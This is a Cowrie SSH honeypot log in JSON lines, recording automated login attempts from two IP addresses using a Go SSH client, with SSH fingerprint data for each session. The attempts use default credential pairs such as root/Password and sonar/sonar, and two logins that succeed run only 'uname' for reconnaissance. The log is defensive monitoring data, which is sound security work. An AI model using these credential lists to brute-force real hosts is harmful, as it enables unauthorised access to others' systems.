{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52284,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea73314279a4","protocol":"ssh","message":"New connection: 212.227.235.229:52284 (1.2.3.4:22) [session: ea73314279a4]","sensor":"my-vps","timestamp":"2025-08-28T07:02:58.087839Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:02:58.089121Z","src_ip":"212.227.235.229","session":"ea73314279a4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:02:58.335954Z","src_ip":"212.227.235.229","session":"ea73314279a4"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"123456","message":"login attempt [mongodb/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:02:59.077218Z","src_ip":"212.227.235.229","session":"ea73314279a4"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:03:00.325642Z","src_ip":"212.227.235.229","session":"ea73314279a4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58368,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b212cf54c07","protocol":"ssh","message":"New connection: 212.227.125.160:58368 (1.2.3.4:22) [session: 2b212cf54c07]","sensor":"my-vps","timestamp":"2025-08-28T07:03:08.021078Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:03:08.021891Z","src_ip":"212.227.125.160","session":"2b212cf54c07"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:03:08.239329Z","src_ip":"212.227.125.160","session":"2b212cf54c07"}
{"eventid":"cowrie.login.failed","username":"app","password":"123456","message":"login attempt [app/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:03:08.894290Z","src_ip":"212.227.125.160","session":"2b212cf54c07"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:03:10.114514Z","src_ip":"212.227.125.160","session":"2b212cf54c07"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34144,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a7409dd2f14","protocol":"ssh","message":"New connection: 212.227.235.229:34144 (1.2.3.4:22) [session: 8a7409dd2f14]","sensor":"my-vps","timestamp":"2025-08-28T07:03:14.639048Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:03:14.640022Z","src_ip":"212.227.235.229","session":"8a7409dd2f14"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:03:14.888613Z","src_ip":"212.227.235.229","session":"8a7409dd2f14"}
{"eventid":"cowrie.login.failed","username":"app","password":"123456","message":"login attempt [app/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:03:16.360401Z","src_ip":"212.227.235.229","session":"8a7409dd2f14"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:03:17.612216Z","src_ip":"212.227.235.229","session":"8a7409dd2f14"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37108,"dst_ip":"1.2.3.4","dst_port":22,"session":"99b4ef859528","protocol":"ssh","message":"New connection: 212.227.125.160:37108 (1.2.3.4:22) [session: 99b4ef859528]","sensor":"my-vps","timestamp":"2025-08-28T07:03:24.583169Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:03:24.583809Z","src_ip":"212.227.125.160","session":"99b4ef859528"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:03:24.806771Z","src_ip":"212.227.125.160","session":"99b4ef859528"}
{"eventid":"cowrie.login.success","username":"root","password":"Password","message":"login attempt [root/Password] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:03:25.476067Z","src_ip":"212.227.125.160","session":"99b4ef859528"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:03:25.947488Z","src_ip":"212.227.125.160","session":"99b4ef859528"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:03:25.948362Z","src_ip":"212.227.125.160","session":"99b4ef859528"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:03:26.172315Z","src_ip":"212.227.125.160","session":"99b4ef859528"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:03:26.173426Z","src_ip":"212.227.125.160","session":"99b4ef859528"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53018,"dst_ip":"1.2.3.4","dst_port":22,"session":"99db91c52258","protocol":"ssh","message":"New connection: 212.227.235.229:53018 (1.2.3.4:22) [session: 99db91c52258]","sensor":"my-vps","timestamp":"2025-08-28T07:03:31.189042Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:03:31.190011Z","src_ip":"212.227.235.229","session":"99db91c52258"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:03:31.444960Z","src_ip":"212.227.235.229","session":"99db91c52258"}
{"eventid":"cowrie.login.success","username":"root","password":"Password","message":"login attempt [root/Password] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:03:32.210623Z","src_ip":"212.227.235.229","session":"99db91c52258"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:03:32.802132Z","src_ip":"212.227.235.229","session":"99db91c52258"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:03:32.802927Z","src_ip":"212.227.235.229","session":"99db91c52258"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:03:33.056861Z","src_ip":"212.227.235.229","session":"99db91c52258"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:03:33.058149Z","src_ip":"212.227.235.229","session":"99db91c52258"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34394,"dst_ip":"1.2.3.4","dst_port":22,"session":"c07d6fceb2a4","protocol":"ssh","message":"New connection: 212.227.125.160:34394 (1.2.3.4:22) [session: c07d6fceb2a4]","sensor":"my-vps","timestamp":"2025-08-28T07:03:40.872031Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:03:40.872742Z","src_ip":"212.227.125.160","session":"c07d6fceb2a4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:03:41.097017Z","src_ip":"212.227.125.160","session":"c07d6fceb2a4"}
{"eventid":"cowrie.login.failed","username":"www","password":"123456","message":"login attempt [www/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:03:41.756439Z","src_ip":"212.227.125.160","session":"c07d6fceb2a4"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:03:42.979004Z","src_ip":"212.227.125.160","session":"c07d6fceb2a4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39990,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b33c702fe6f","protocol":"ssh","message":"New connection: 212.227.235.229:39990 (1.2.3.4:22) [session: 7b33c702fe6f]","sensor":"my-vps","timestamp":"2025-08-28T07:03:47.609565Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:03:47.610466Z","src_ip":"212.227.235.229","session":"7b33c702fe6f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:03:47.863946Z","src_ip":"212.227.235.229","session":"7b33c702fe6f"}
{"eventid":"cowrie.login.failed","username":"www","password":"123456","message":"login attempt [www/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:03:48.627849Z","src_ip":"212.227.235.229","session":"7b33c702fe6f"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:03:49.883273Z","src_ip":"212.227.235.229","session":"7b33c702fe6f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51450,"dst_ip":"1.2.3.4","dst_port":22,"session":"2dccdc16c108","protocol":"ssh","message":"New connection: 212.227.125.160:51450 (1.2.3.4:22) [session: 2dccdc16c108]","sensor":"my-vps","timestamp":"2025-08-28T07:03:57.610850Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:03:57.621885Z","src_ip":"212.227.125.160","session":"2dccdc16c108"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:03:57.834849Z","src_ip":"212.227.125.160","session":"2dccdc16c108"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"sonar","message":"login attempt [sonar/sonar] failed","sensor":"my-vps","timestamp":"2025-08-28T07:03:58.733634Z","src_ip":"212.227.125.160","session":"2dccdc16c108"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:03:59.960030Z","src_ip":"212.227.125.160","session":"2dccdc16c108"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47888,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b5350ec3e47","protocol":"ssh","message":"New connection: 212.227.235.229:47888 (1.2.3.4:22) [session: 6b5350ec3e47]","sensor":"my-vps","timestamp":"2025-08-28T07:04:04.316812Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:04:04.317754Z","src_ip":"212.227.235.229","session":"6b5350ec3e47"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:04:04.568152Z","src_ip":"212.227.235.229","session":"6b5350ec3e47"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"sonar","message":"login attempt [sonar/sonar] failed","sensor":"my-vps","timestamp":"2025-08-28T07:04:05.330652Z","src_ip":"212.227.235.229","session":"6b5350ec3e47"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:04:06.582576Z","src_ip":"212.227.235.229","session":"6b5350ec3e47"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38570,"dst_ip":"1.2.3.4","dst_port":22,"session":"da80d40cfa8b","protocol":"ssh","message":"New connection: 212.227.125.160:38570 (1.2.3.4:22) [session: da80d40cfa8b]","sensor":"my-vps","timestamp":"2025-08-28T07:04:14.251116Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:04:14.251826Z","src_ip":"212.227.125.160","session":"da80d40cfa8b"}
